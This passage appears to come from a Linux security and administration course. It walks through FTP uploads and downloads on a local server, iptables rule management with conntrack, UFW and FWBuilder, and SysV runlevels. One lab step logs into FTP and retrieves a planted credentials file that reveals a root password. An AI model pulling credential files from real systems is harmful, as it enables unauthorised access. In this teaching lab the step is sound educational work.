systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-ModemManager.service-V6U3lg  upload.txt

kali@kali:/var/tmp$ 

Now that the file is created, we can log back into the FTP server and upload the file with the put command.

kali@kali:/var/tmp$ ftp localhost
Connected to localhost.
220 (vsFTPd 3.0.3)
Name (localhost:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xrwx    2 65534    65534        4096 Jul 09 05:50 pub
226 Directory send OK.
ftp> put upload.txt
local: upload.txt remote: upload.txt
200 EPRT command successful. Consider using EPSV.
553 Could not create file.
ftp>

The file was not uploaded, and the server returned the error message 553 Could not create file. Note that the permissions on the pub directory show it is writable by everyone. Let's change into that directory and attempt the upload again.

---
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> put upload.txt
local: upload.txt remote: upload.txt
200 EPRT command successful. Consider using EPSV.
150 Ok to send data.
226 Transfer complete.
15 bytes sent in 0.00 secs (610.3516 kB/s)
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-------    1 137      147            15 Jul 09 06:50 upload.txt
226 Directory send OK.
ftp> exit
221 Goodbye.

Let's log in with a user account to the FTP server. We'll use the kali user to do this.

kali@kali:/var/tmp$ ftp localhost
Connected to localhost.
220 (vsFTPd 3.0.3)
Name (localhost:kali): kali
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Desktop
drwxr-xr-x    6 1001     1001         4096 Jul 09 05:17 Documents
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Downloads
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Music
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Pictures
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Public
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Templates
drwxr-xr-x    2 1001     1001         4096 Jul 09 05:17 Videos
-rw-r--r--    1 1001     1001           85 Jul 09 06:56 specialcredentials.txt
226 Directory send OK.
ftp> 

It is important to note that this user account requires the correct password, unlike the anonymous account, which accepts any password or none at all. This login lands in the user's home directory instead of the pub directory, and there's an interesting file here too. Let's download the specialcredentials.txt file and take a look at its contents. To download a file from an FTP server, we'll use the get command.

---
ftp> get specialcredentials.txt
local: specialcredentials.txt remote: specialcredentials.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for specialcredentials.txt (85 bytes).
226 Transfer complete.
85 bytes received in 0.00 secs (892.5571 kB/s)
ftp> exit
221 Goodbye.

kali@kali:/var/tmp$ cat specialcredentials.txt
The password to the root account is "password." Surely, no one will ever guess this!

Before concluding our coverage of FTP, let's briefly talk about two subjects: Active vs. Passive FTP and Binary vs. ASCII modes. FTP uses two channels: a command channel and a data channel. In both Active and Passive modes, the client connects from a random port to port 21 on the server (in a default configuration) to establish the command channel; the difference lies in how the data channel is set up. In Active Mode, the server initiates the data channel, connecting from port 20 back to a random port on the client. In Passive Mode, the client sends a PASV command over the command channel; the server responds with a random port it has opened, and the client then connects to that port to establish the data channel. Depending on how the FTP server (and any firewalls in between) is configured, the mode used by the client may need to be changed, as sketched below.
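
A minimal sketch, assuming the classic command-line ftp client, which provides a passive command to toggle the data-connection mode during a session (a -p option to start in passive mode is also commonly available):

ftp> passive
Passive mode on.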

Binary vs. ASCII mode has to do with how the file is transferred. If the file is a text file, ASCII mode can be used. When a transfer is done from a UNIX to a Microsoft system in ASCII mode, a carriage return (often displayed as ^M) is automatically added to the end of each line; when the transfer is from a Microsoft host to a UNIX host, that carriage return is removed from each line ending. This ensures a text file remains readable when transferred from one type of system to another. Binary mode keeps the file in its original state, without modifying the line endings. If transferring a binary file, Binary mode should be used; otherwise the binary may be corrupted by these line-ending modifications. Let's quickly go over the FTP ascii and binary commands.

kali@kali:/var/tmp$ ftp localhost
Connected to localhost.
220 (vsFTPd 3.0.3)
Name (localhost:kali): kali
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ascii
200 Switching to ASCII mode.
ftp> bin
200 Switching to Binary mode.
ftp> exit
221 Goodbye.

ACLs Overview and Netfilter Introduction (iptables -L)

Before we can cover basic firewall configurations, it is important to understand what an Access Control List (ACL) is. An ACL is a list of rules that controls access to computer resources. ACLs can apply to either the filesystem or the network; in this section, we'll strictly be covering network ACLs.

A network ACL will typically have three actions it can take. These would be ACCEPT, DROP, or REJECT. Let's look at a firewall like a guest list at a fancy party. When someone arrives at the party doors, the guest list is checked. If they are on that list under ACCEPT, they are let inside. If they are not on the list, they won't be allowed in the party. This would be the same as DROP. Let's pretend there's a special category of unwelcome guests that may show up. This would fall under the REJECT list, where an explanation is given to the guest that is not allowed in. "Sir, last time we invited you, you ate all the food and didn't leave any for anyone else." Not only would this guest not be allowed in, but a response message is provided by the staff member controlling entry at the door.

Firewalls also have a default policy. In this example, the default policy is DROP (not allowed): anyone who isn't on the list is not allowed into the party. If the policy were a default ACCEPT, only those explicitly listed under DROP or REJECT would be kept out of the party. When it comes to network traffic, a default ACCEPT policy is the easiest to work with, since many unknown connections may need to reach a networked device, but it is much less secure than a default DROP policy. With a default DROP policy, access is explicitly granted only to trusted devices on the network. An ACL is read from top to bottom, and the rules are applied in the order they are read. This means that if a rule explicitly allows a type of traffic and a later rule drops that same traffic, the traffic will be allowed; it doesn't matter that there are conflicting rules for the same match, because the firewall takes the first action that matches.

The direction of the traffic also needs to be considered. Most of the time, people think only of traffic coming from outside the network to internal network resources, but firewalls also handle internal network access and can be what is known as stateless or stateful.

The state, in this case, refers to the origination of an established network session. The firewall monitors network traffic and allows sessions that were permitted to remain permitted. If a user opens a network session from the internal network to an outside resource and the traffic is allowed, the session state is stored in the firewall's records, and any further communication between that internal host and the remote resource is allowed as long as that session remains open. This takes more computing resources on the firewall and can be considered a more robust way to manage network traffic. iptables is a stateless firewall by default, but it can be made stateful if desired.

For the sake of keeping this at a basic level, this will not be covered in depth in this course. It is more important to understand that state can play a role in how some firewalls are configured.

The Linux kernel has a packet filtering framework, called netfilter. The utility that hooks into this framework is iptables. iptables is used to create and/or modify ACLs for the Linux firewall. Let's take a look at the default iptables listing.

$ sudo iptables -L
[sudo] password for kali: 
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

$ 

iptables has multiple tables to store different types of ACLs. The default table is called the filter table. This is the only table that we will cover in this course, but you should be aware that the following tables also exist within iptables. The following was taken directly from the manpage of iptables.

filter: This is the default table (if no -t option is passed). It contains the built-in chains INPUT (for packets destined to local sockets), FORWARD (for packets being routed through the box), and OUTPUT (for locally-generated packets).

nat: This table is consulted when a packet that creates a new connection is encountered. It consists of four built-ins: PREROUTING (for altering packets as soon as they come in), INPUT (for altering packets destined for local sockets), OUTPUT (for altering locally-generated packets before routing), and POSTROUTING (for altering packets as they are about to go out). IPv6 NAT support is available since kernel 3.7.

mangle: This table is used for specialized packet alteration. Until kernel 2.4.17 it had two built-in chains: PREROUTING (for altering incoming packets before routing) and OUTPUT (for altering locally-generated packets before routing). Since kernel 2.4.18, three other built-in chains are also supported: INPUT (for packets coming into the box itself), FORWARD (for altering packets being routed through the box), and POSTROUTING (for altering packets as they are about to go out).

raw: This table is used mainly for configuring exemptions from connection tracking in combination with the NOTRACK target. It registers at the netfilter hooks with higher priority and is thus called before ip_conntrack, or any other IP tables. It provides the following built-in chains: PREROUTING (for packets arriving via any network interface) OUTPUT (for packets generated by local processes)

security: This table is used for Mandatory Access Control (MAC) networking rules, such as those enabled by the SECMARK and CONNSECMARK targets. Mandatory Access Control is implemented by Linux Security Modules such as SELinux. The security table is called after the filter table, allowing any Discretionary Access Control (DAC) rules in the filter table to take effect before MAC rules. This table provides the following built-in chains: INPUT (for packets coming into the box itself), OUTPUT (for altering locally-generated packets before routing), and FORWARD (for altering packets being routed through the box).

In the default table (filter), the INPUT, FORWARD, and OUTPUT chains are displayed. Chains define the direction of network traffic flow. INPUT relates to connections coming into the host, OUTPUT to connections leaving the host, and FORWARD to traffic being routed through the host, which is commonly used in a Linux router configuration. There are more chains in other tables, but those are out of scope for this course.

The default policy for each of the chains in the listing is set to ACCEPT, so we can consider the firewall to be completely open. For a chain's default policy, the available actions are ACCEPT and DROP (REJECT can be used as a rule target, but not as a chain policy). Let's change the default policy for the FORWARD chain to DROP, since our Kali host is not going to function as a router. We do this with the -P (policy) option.

$ sudo iptables -P FORWARD DROP

$ sudo iptables -L             
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy DROP)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

Now that we have a basis of terms and can list the rules in the default table, let's move on to creating the rules that make up the firewall. Understanding that the host has multiple network paths - INPUT (traffic going into the host), OUTPUT (traffic coming out of the host), and FORWARD (traffic routed through the host) - is critical to understanding the nature of the traffic we will accept, reject, or drop.

IPTables (Parameters, Modifying Rules with -A/-D/-I)

Covering firewalls as a concept would be useless without analyzing a few rules. Beyond this, it is much stronger if we know how to set iptables and have the capability of setting up the firewall. Let's build on what we learned about ACLs, default policies, actions, and listing the firewall rules on a Linux host.

To begin, let's define some important iptables options. These are used to set the rules of the firewall.

The -p option defines what protocol is to be considered in the rule. The most common protocol types are tcp, udp, and icmp traffic. The all parameter can be passed to the option to cover all possible protocols, as well.

The -s option defines the source address in the connection. The parameter can be a network name, hostname, a network IP address with a /mask value, or simply an IP address of a host. This is the location the network traffic is coming from.

The -d option defines the destination address in the connection. The parameter for the destination also follows the syntax options for the -s option. This is the location the network traffic is going to.

The -i and -o options define the interfaces involved in the connection: -i is the interface the traffic comes in on, and -o is the interface it goes out on. These options will not be covered further in this section, as they are more related to routing and working with the FORWARD chain, but it is still useful to know how they relate to firewall traffic flow.

Knowing these options alone cannot get us all the way to configuring the firewall rules. We also need to cover how to add, check, delete, insert, and replace rules in the chains.

The -A option is used to append a rule to the chain entered as the parameter. This will add the rule to the end of the rules already in the chain.

The -C option is used to check if the rule is already in the chain. This helps prevent duplicate entries in a chain.

The -D option is used to delete a rule from a chain and can use the rule-specification or the line number.

The -I option is used to insert a rule in a chain using a line number and then the rule-specification to insert in place for that line number. The other rules below that line entry will shift by one, so be careful when inserting multiple rules one after the other.

The -R option is used to replace a rule in a chain using a line number and then the rule-specification to replace the entry in that line. This is different than -I in that the other rule line numbers will not change and the value of the entry line number chosen will be replaced with the new value. Be careful not to replace the wrong entry, as that will remove the rule from the chain.

Now that we have the important options covered, let's work with adding some firewall rules with iptables. For the following demonstrations, the IP addresses used will be arbitrary. This is meant to demonstrate how to work with the iptables utility.

$ sudo iptables -s 192.168.1.0/24 -p all -A INPUT
[sudo] password for kali:

$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
           all  --  192.168.1.0/24       anywhere

Chain FORWARD (policy DROP)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
                                                                                                                                                                                                                             
$

For the sake of this activity, let's add some more arbitrary rules to the INPUT chain. Let's add the localhost IP, 127.0.0.1, as the source and destination. Let's also add the IP address of 192.168.1.37 as the source with the TCP protocol.

$ sudo iptables -s 127.0.0.1 -d 127.0.0.1 -A INPUT

$ sudo iptables -s 192.168.1.37 -p tcp -A INPUT

$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
           all  --  192.168.1.0/24       anywhere            
           all  --  localhost            localhost
           tcp  --  192.168.1.37         anywhere      

Chain FORWARD (policy DROP)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

$
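
The -C option described earlier can be used to confirm whether a rule-specification already exists before appending it again. As a brief sketch using the rule we added for the 192.168.1.0/24 network (the command produces no output and returns exit status 0 when the rule exists; a missing rule results in an error message and a non-zero exit status):

$ sudo iptables -C INPUT -s 192.168.1.0/24 -p all

$ echo $?
0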

Let's now append another firewall rule for the name localhost and see what happens. For this, let's just add it as the source address.

$ sudo iptables -s localhost -A INPUT

$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
           all  --  192.168.1.0/24       anywhere            
           all  --  localhost            localhost           
           tcp  --  192.168.1.37         anywhere            
           all  --  localhost            anywhere
           all  --  localhost            anywhere   

Chain FORWARD (policy DROP)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

$

Notice that the first time, we added the literal IP for localhost, 127.0.0.1; in the sudo iptables -L output, that rule-specification resolved to the name localhost. When we used the name localhost as the source address in this last command, two identical entries appeared. This is due to localhost resolving to both the IPv4 and the IPv6 loopback entries on the system, with those entries resolving back to localhost in the output. Let's take a look at deleting these duplicate lines we just added.

$ sudo iptables -s localhost -D INPUT

$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
           all  --  192.168.1.0/24       anywhere            
           all  --  localhost            localhost           
           tcp  --  192.168.1.37         anywhere            

Chain FORWARD (policy DROP)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

The command to delete the duplicate rule ended up removing both of the newly added rules. It didn't delete the earlier localhost rule, since that rule's destination specification differs from the rules added by the last command. Let's append that rule again and list the chain with the --line-numbers option.

$ sudo iptables -s localhost -A INPUT

$ sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               all  --  192.168.1.0/24       anywhere            
2               all  --  localhost            localhost           
3               tcp  --  192.168.1.37         anywhere            
4               all  --  localhost            anywhere            
5               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

Now that we can see the line numbers in the output, we can use a line number to delete one of the duplicate entries and avoid removing every entry that matches the same rule-specification. Let's do this now.

$ sudo iptables -D INPUT 5

$ sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               all  --  192.168.1.0/24       anywhere            
2               all  --  localhost            localhost           
3               tcp  --  192.168.1.37         anywhere            
4               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

It is important to note that firewalls work from the top of the list down, checking each line until a match is found. This means that if there are conflicts between rules, the first matching line is the one the firewall uses. Looking at the output again, we can see a potential conflict between the 192.168.1.0/24 network rule and the 192.168.1.37 host rule. Let's insert the rule-specification for 192.168.1.37 at line 1 and then delete the duplicate entry that was already in the list.

$ sudo iptables -s 192.168.1.37 -I INPUT 1

$ sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               all  --  192.168.1.37         anywhere
2               all  --  192.168.1.0/24       anywhere            
3               all  --  localhost            localhost           
4               tcp  --  192.168.1.37         anywhere   
5               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$ sudo iptables -D INPUT 4

$ sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               all  --  192.168.1.37         anywhere            
2               all  --  192.168.1.0/24       anywhere            
3               all  --  localhost            localhost           
4               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

We can also show the amount of traffic matched by each rule, in packets and bytes, with the -v option. Let's take a look at the current traffic counters. In the command, we also add the -n option to display IP addresses instead of canonical names. The output in your terminal session will be different.

$ sudo iptables -nvL
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0            all  --  *      *       192.168.1.37         0.0.0.0/0           
   78  5464            all  --  *      *       192.168.1.0/24       0.0.0.0/0           
    6   504            all  --  *      *       127.0.0.1            127.0.0.1           
   14   904            all  --  *      *       127.0.0.1            0.0.0.0/0           

Chain FORWARD (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

$

Let's generate some network traffic from our localhost to our localhost with the ping utility. After the ping, let's look at the traffic amount again. Again, your output results will be different than the listing shown.

$ ping -c 10 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.019 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.037 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.064 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.029 ms
64 bytes from 127.0.0.1: icmp_seq=5 ttl=64 time=0.029 ms
64 bytes from 127.0.0.1: icmp_seq=6 ttl=64 time=0.046 ms
64 bytes from 127.0.0.1: icmp_seq=7 ttl=64 time=0.043 ms
64 bytes from 127.0.0.1: icmp_seq=8 ttl=64 time=0.030 ms
64 bytes from 127.0.0.1: icmp_seq=9 ttl=64 time=0.028 ms
64 bytes from 127.0.0.1: icmp_seq=10 ttl=64 time=0.033 ms

--- 127.0.0.1 ping statistics ---
10 packets transmitted, 10 received, 0% packet loss, time 9199ms
rtt min/avg/max/mdev = 0.019/0.035/0.064/0.011 ms

$ sudo iptables -nvL
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0            all  --  *      *       192.168.1.37         0.0.0.0/0           
   78  5464            all  --  *      *       192.168.1.0/24       0.0.0.0/0           
   26  2184            all  --  *      *       127.0.0.1            127.0.0.1           
   34  2584            all  --  *      *       127.0.0.1            0.0.0.0/0           

Chain FORWARD (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

$

One last thing before we move on: iptables rules are not persistent across a reboot. The current ruleset can be exported with the iptables-save command. Let's go ahead and dump the current rules now.

$ sudo iptables-save
# Generated by iptables-save v1.8.7 on Mon Jul 19 06:07:27 2021
*filter
:INPUT ACCEPT [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -s 192.168.1.37/32 
-A INPUT -s 192.168.1.0/24 
-A INPUT -s 127.0.0.1/32 -d 127.0.0.1/32 
-A INPUT -s 127.0.0.1/32 
COMMIT
# Completed on Mon Jul 19 06:07:27 2021

$
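
Note that iptables-save by itself only prints the ruleset to standard output. To persist the rules across reboots, the output is typically redirected to a file that is restored at boot. A minimal sketch, assuming the iptables-persistent package is installed (on Debian-based systems it loads /etc/iptables/rules.v4 at startup):

$ sudo iptables-save | sudo tee /etc/iptables/rules.v4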

Now that we covered how to work with adding rules to the firewall and modifying those, let's take a look at refining these rules further to make a more practical firewall.

IPTables (Extended Rules and Default Policies)

Extended rules make the firewall more practical for filtering traffic based on multiple conditions. These are important to understand if the network traffic needs to be considered when creating the firewall ruleset.

In the last section, we looked at the process of adding, removing, and inserting rules within a chain in iptables. If, while working through the demonstration, you thought, "These rules don't look like they do anything," you'd be absolutely right! The default policy on the INPUT chain is ACCEPT, and none of the rules we added specified an action of their own. Since no action was given in the commands we entered, matching traffic simply falls through to the chain's default policy. Even if we changed the default policy to a different action with the -P option, the rules in the chain would still inherit that policy's action.

Let's take another look at the iptables we have set up already. Again, your output may appear differently than the demonstration.

$ sudo iptables -L --line-numbers
[sudo] password for kali: 
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               all  --  192.168.1.37         anywhere            
2               all  --  192.168.1.0/24       anywhere            
3               all  --  localhost            localhost           
4               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

In the rule listing, let's suppose that we want to drop all traffic from the 192.168.1.0/24 network but still allow the host at 192.168.1.37. Let's replace the rule for the network and add the DROP target with the -j option.

$ sudo iptables -R INPUT 2 -s 192.168.1.0/24 -j DROP

$ sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               all  --  192.168.1.37         anywhere            
2    DROP       all  --  192.168.1.0/24       anywhere            
3               all  --  localhost            localhost           
4               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

As shown in the listing above, the target changed to DROP for the 192.168.1.0/24 network. Since firewalls read rules from the first rule down until a match is found, the 192.168.1.37 host will still have access to our host. Let's refine this host's access so that it can only reach TCP port 8080 on our localhost. Again, we'll use the replace option (-R) for this line entry. To specify the port, we will use the --dport (destination port) option.

$ sudo iptables -R INPUT 1 -s 192.168.1.37 -d 127.0.0.1 -p tcp --dport 8080

$ sudo iptables -nL --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               tcp  --  192.168.1.37         127.0.0.1            tcp dpt:8080
2    DROP       all  --  192.168.1.0/24       0.0.0.0/0           
3               all  --  127.0.0.1            127.0.0.1           
4               all  --  127.0.0.1            0.0.0.0/0           

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

If the source port is known and relevant to a firewall rule, the --sport option can be used to specify it. There is another option that can be used to create rules based on the state of a connection. It is part of the conntrack module, which is loaded with the -m conntrack option, and the match itself is the --ctstate option, documented in the iptables-extensions manpage. There are more connection tracking states, but here are some of the most important ones. Note that on older Linux kernels, this match may appear as --state instead of --ctstate.

INVALID: The packet is associated with no known connection.

NEW: The packet has started a new connection or otherwise associated with a connection that has not seen packets in both directions.

ESTABLISHED: The packet is associated with a connection that has seen packets in both directions.

RELATED: The packet is starting a new connection, but is associated with an existing connection, such as an FTP data transfer or an ICMP error.

UNTRACKED: The packet is not tracked at all, which happens if you explicitly untrack it by using -j CT --notrack in the raw table.

Utilizing conntrack makes iptables a stateful firewall.

To ensure that packets that are part of an existing connection, or related to one, are accepted, let's insert the following as a new rule.

$ sudo iptables -I INPUT 1 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

$ sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1    ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED
2               tcp  --  192.168.1.37         localhost            tcp dpt:http-alt
3    DROP       all  --  192.168.1.0/24       anywhere            
4               all  --  localhost            localhost           
5               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

It's a good practice to add a DROP action for any packet in an INVALID connection state. Let's insert this rule near the top of the INPUT chain, directly after the rule accepting RELATED and ESTABLISHED traffic. Your output may appear different from the demonstration, but the first two rules should look the same.

$ sudo iptables -I INPUT 2 -m conntrack --ctstate INVALID -j DROP

$  sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1    ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED
2    DROP       all  --  anywhere             anywhere             ctstate INVALID
3               tcp  --  192.168.1.37         localhost            tcp dpt:http-alt
4    DROP       all  --  192.168.1.0/24       anywhere            
5               all  --  localhost            localhost           
6               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

With this configuration of the firewall rules, any traffic that is part of a connection originating from our host will be accepted back into our host, and INVALID packets will be immediately dropped.
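
To round out the ruleset, the INPUT chain's default policy could also be changed from ACCEPT to DROP so that anything not explicitly allowed is discarded. This is only a sketch - apply it only after confirming that the ACCEPT rules above cover all of the traffic you need (including your own remote session), or you may lock yourself out:

$ sudo iptables -P INPUT DROP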

Now that we covered extended rules, default policies, additional options, and creating a stateful firewall with iptables, you should now have the knowledge to create custom rule sets to satisfy a network's or host's firewall needs.

UFW and FWBuilder

Sometimes, it's easier to have a frontend interface to handle the firewall rules. There are two tools that we can use to accomplish this: UFW (Uncomplicated Firewall) and FWBuilder. Both of these tools are simply frontend interfaces that leverage the power of iptables.

First, let's look more at UFW. We can install this with sudo apt install ufw.

Now that UFW is installed, we can check the status of the firewall with the sudo ufw status command. Let's go ahead and do this.

$ sudo ufw status
Status: inactive

The power of UFW lies in its ease of use. It is a simple tool for adding firewall rules, and rules can be based on the application profiles available on a host. To view the list of application profiles that UFW can use, run the sudo ufw app list command. Your output may be different from the demonstration.

$ sudo ufw app list
Available applications:
  AIM
  Bonjour
  CIFS
  DNS
---
Output trimmed
---
  SSH
  Samba
  Socks
  Telnet
  Transmission
  Transparent Proxy
  VNC
  WWW
  WWW Cache
  WWW Full
  WWW Secure
---
Output trimmed

$

SSH is included in the listing. We can get more information about this application profile with the sudo ufw app info SSH command. Note that case-sensitivity may affect the tool's output.

$ sudo ufw app info SSH
Profile: SSH
Title: SSH server
Description: SSH server

Port:
  22/tcp
 
$

To allow traffic through the firewall for an application profile, we can use the allow directive. Let's add an allow rule for SSH.

$ sudo ufw allow SSH
Rules updated
Rules updated (v6)

$
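
Rules can also be defined by port and protocol rather than by application profile. As a quick sketch (the port here is arbitrary; adjust it to the service you actually want to expose):

$ sudo ufw allow 8080/tcp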

Now that SSH is added to the host firewall, the firewall needs to be enabled.

$ sudo ufw enable
Firewall is active and enabled on system startup

$ sudo ufw status
Status: active

To                         Action      From
--                         ------      ----
SSH                        ALLOW       Anywhere                  
SSH (v6)                   ALLOW       Anywhere (v6)             

$

As shown in the listing, SSH is allowed on the host firewall from Anywhere. This is only basic coverage of the ufw tool. Before moving on to FWBuilder, let's disable UFW.

$ sudo ufw disable
Firewall stopped and disabled on system startup

$ sudo ufw status
Status: inactive

$

With UFW disabled, we can quickly look at FWBuilder and the GUI interface it has to offer.

To use fwbuilder, enter sudo fwbuilder. Your output may be different than the demonstration.

$ sudo fwbuilder
Firewall Builder GUI 5.3.7
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'

fwbuilder provides a drag-and-drop GUI, which is especially convenient when rules are out of order and need to be moved around. Rule modifications are made in the lower Editor portion of the screen, and the Editor pane changes depending on what is selected in the Policy pane.

It may be important to note that fwbuilder can automatically translate between IPv4 and IPv6 addresses, or rules can be specified to fit either need. When finished building the firewall rules in the GUI, the rules can be compiled and installed on the host. The file generated by the compilation is a script that applies the ruleset for the specified platform - in the case of this demonstration, iptables.

Managing Network Services

It is important to know and understand how services work on Linux systems. These services make up the capabilities of a host or network and can be leveraged to gain more privileges on a host or gain access to another host on a network. Beyond the benefits of understanding this from a security perspective, it is also valuable for a Linux System Administrator to know how to work with services on a system to ensure full system functionality. In this section, we'll be looking at two variations of Linux services: SysV Init and Systemd.

SysV (service, init)

SysV Init is the legacy system for managing Linux services. Despite being considered legacy, it is still widely in use, and Systemd is backward compatible with it. To best understand the services run on a system, it is important to define what runlevels are. Runlevels are designations for how a Linux system starts and which services are running. They are divided into seven runlevels, numbered 0 through 6.

  Runlevel 0 is the system state when it is halted - or powered off. This is not an effective runlevel, but it can be called on to execute a system shutdown.
  Runlevel 1 is known as Single User Mode. This is the state where only one user (root) can log into the system to conduct administrative tasks. Networking is disabled for this runlevel, and the command-line interface is used.
  Runlevel 2 is Multiuser Mode. The network is disabled and the command-line interface is used.
  Runlevel 3 is Multiuser Mode with Networking. The command-line interface is used.
  Runlevel 4 is an Undefined Mode by default. This is available if a custom runlevel is wanted.
  Runlevel 5 is Multiuser Mode with a Graphical User Interface. Networking is also enabled. This is the default runlevel on any Linux distribution that uses a GUI.
  Runlevel 6 is the runlevel used to restart the Linux host. This is another runlevel that is not effective, but it can be called on to execute a system restart.

To display the current runlevel, the runlevel command can be entered in the terminal. Let's do this to see the current runlevel of our Kali host.

$ runlevel
N 5

The configuration file that sets a Linux system's default runlevel is /etc/inittab. Let's take a look at a typical /etc/inittab file. It is important to know that Kali does not use SysV Init, so many of the concepts in this section will not be present on our Kali installation. For the following demonstration, a legacy version of Ubuntu is used to showcase the concepts we are covering.

root@e1bf7396aea4:/# cat /etc/inittab
# /etc/inittab: init(8) configuration.
# $Id: inittab,v 1.91 2002/01/25 13:35:21 miquels Exp $

# The default runlevel.
id:2:initdefault:

# Boot-time system configuration/initialization script.
# This is run first except when booting in emergency (-b) mode.
si::sysinit:/etc/init.d/rcS

# What to do in single-user mode.
~~:S:wait:/sbin/sulogin

# /etc/init.d executes the S and K scripts upon change
# of runlevel.
#
# Runlevel 0 is halt.
# Runlevel 1 is single-user.
# Runlevels 2-5 are multi-user.
# Runlevel 6 is reboot.

l0:0:wait:/etc/init.d/rc 0
l1:1:wait:/etc/init.d/rc 1
l2:2:wait:/etc/init.d/rc 2
l3:3:wait:/etc/init.d/rc 3
l4:4:wait:/etc/init.d/rc 4
l5:5:wait:/etc/init.d/rc 5
l6:6:wait:/etc/init.d/rc 6

---
Output Trimmed
---

root@e1bf7396aea4:/#

This /etc/inittab file is from an Ubuntu 6.06 installation. Several entries in the listing are worth examining. The format for these lines is unique-identifier:runlevel:action:process. The id:2:initdefault: line sets the default runlevel for this host; for this installation, the default runlevel is Runlevel 2. In the si::sysinit:/etc/init.d/rcS line, the unique identifier is si, there is no associated runlevel, the action to take is sysinit, and the process is /etc/init.d/rcS, a script that will execute when this entry is called.

